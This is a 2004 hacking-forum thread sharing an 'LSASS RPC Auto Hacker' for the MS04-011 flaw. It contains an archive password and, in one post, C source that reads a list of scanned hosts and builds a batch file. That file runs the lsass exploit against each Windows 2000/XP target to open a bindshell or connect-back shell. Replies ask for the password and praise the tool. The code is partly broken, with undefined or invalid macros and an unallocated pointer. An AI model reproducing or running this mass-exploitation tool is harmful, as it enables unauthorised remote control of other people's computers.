Sponsored by: â–ˆ Sparkhost - Hosting Without Compromises! â–ˆ Hybrid Performance Web Hosting â–ˆ Spark Host Stream Hosting â–ˆ Hybrid IRC & IRCd Server Shell Accounts
Lsass Rpc Auto Hacker By Cyrex
#211
Posted 11 August 2004 - 04:59 PM
#212
Posted 14 August 2004 - 08:40 AM
Edit: I saw posts above got the pass thanks
pass : f44394tm$T%trgerg..,g4$FF
#213
Posted 15 August 2004 - 02:00 PM
#214
Posted 16 August 2004 - 07:46 AM
nce tool
#215
Posted 16 August 2004 - 08:05 AM
is the passwordLooks good dude . Can i get password for it?
Edit: I saw posts above got the pass thanks
pass : f44394tm$T%trgerg..,g4$FF
#216
Posted 17 August 2004 - 12:20 PM
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#define checked "checked.txt"
#define BUFSIZE 2000
#define MAXLEN 27
#define 2K "c:\\WINNT\\system32\\cmd.exe"
void usage(char *prog);
int dojob();
void strip(char *line)
{
char *c;
if ((c = strchr(line, '\n'))) *c = '\0';
if ((c = strchr(line, '\r'))) *c = '\0';
}
void usage(char *prog)
{
printf("Usage: %s [bindport] [ConnectBackIP]\n",prog);
printf("e.g..: %s 6667 127.0.0.1\n\n",prog);
printf("[] means not required\n");
exit(-1);
}
int dojob()
{
FILE *check,*fp;
char *run[3];
sleep(5);
printf("[*] Running Auto Hacker now\n");
if((check=fopen(XP,"r"))==NULL)
{
printf("cmd.exe not found\n");
}
if((fp=fopen("hack.bat","r+"))== NULL)
{
printf("[*] Either hack.bat is changed or you deleted it..\n");
exit(-1);
}
fprintf(fp,"\r\ndel hack.bat");
fclose(fp);
run[0]=malloc(32);
run[0]=XP;
strcpy(run[1],"/C hack.bat");
run[2]= 0;
execve(run[0],run,NULL);
}
int main(int argc, char *argv[])
{
FILE *check,*fp,*n;
char line[BUFSIZE];
char *host;
char *run[5];
char *uu[BUFSIZE];
int pid;
int opt=0,op=0;
char intro[]=
"\n ======================================\r\n"
" | |\r\n"
" | MS04011 Lsasrv.dll RPC Auto Hacker |\r\n"
" | (c) 2004 by cyrex |\r\n"
" | ENJOY! |\r\n"
" \\__ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ __/\r\n\n";
printf("%s",intro);
if(argc>3) { usage(argv[0]); }
if((argc>2) && !opt)
{
op=1;
}
if((argc>1) && !opt)
{
opt=1;
} else {
printf("[*] Using default bindshell port 666\n");
}
if((argc>1) && opt)
{
if(op)
{
}
if(!op) {
printf("[*] Using bindshell port %s\n",argv[1]);
}
}
if((argc>2) && op)
{
printf("[*] Using IP for connect Back %s port %s\n",argv[2],argv[1]);
}
if((check=fopen(checked,"r+")) == NULL)
{
printf("Error() File not found (%s)\n",checked);
exit(-1);
}
printf("[*] Checking for (%s)...OK\n",checked);
if((n=fopen("lsass.exe","r")) == NULL)
{
printf("Error() File not found (lsass.exe)\n");
exit(-1);
}
printf("[*] Checking for (lsass.exe)...OK\n");
sleep(1);
printf("[*] Creating Auto Hacking File...\n");
while(!feof(check)){
memset(line, '\0', BUFSIZE);
fgets(line,sizeof(line),check);
line[11]='\0';
host = line+12;
strip(host);
strtok(host, " ");
//host++;
if(strstr(line,"5.1")) {
if((fp=fopen("hack.bat","a+"))== NULL)
{
printf("Cannot create batch file\n");
exit(-1);
}
if((argc>1) && opt)
{
if(op)
{
fprintf(fp,"lsass 0 %s %s %s\r\n",argv[1],host,argv[2]);
}
if(!op) {
fprintf(fp,"lsass 0 %s %s\r\n",argv[1],host);
}
}
if(!opt) {
fprintf(fp,"lsass 0 666 %s\r\n",host);
}
fclose(fp);
}
if(strstr(line,"5.0")) {
if((fp=fopen("hack.bat","a+"))== NULL)
{
printf("Cannot create batch file\n");
exit(-1);
}
if((argc>1) && opt)
{
if(op)
{
fprintf(fp,"lsass 1 %s %s %s\r\n",argv[1],host,argv[2]);
}
if(!op) {
fprintf(fp,"lsass 1 %s %s\r\n",argv[1],host);
}
}
if(!opt) {
fprintf(fp,"lsass 1 666 %s\r\n",host);
}
fclose(fp);
}
}
printf("[*] Finished..\n");
printf("[*] Sleeping a while\n");
sleep(2);
dojob();
}Now the version is for Win 2k without creating folders and copy cmd
#217
Posted 17 August 2004 - 03:11 PM
#218
Posted 18 August 2004 - 10:41 AM
#219
Posted 22 August 2004 - 09:08 AM
can't wait to test
#220
Posted 24 August 2004 - 04:11 AM
#221
Posted 24 August 2004 - 07:42 AM
or something like that, how can i fix it?
i run winxp with SP1
#222 Guest_monty_*
Posted 24 August 2004 - 09:12 AM
limme watch too
really nice tool
greetz
#223
Posted 03 September 2004 - 09:07 AM
#224
Posted 16 September 2004 - 11:59 PM
#225
Posted 19 September 2004 - 08:46 AM
0 user(s) are reading this topic
0 members, 0 guests, 0 anonymous users




This topic is locked







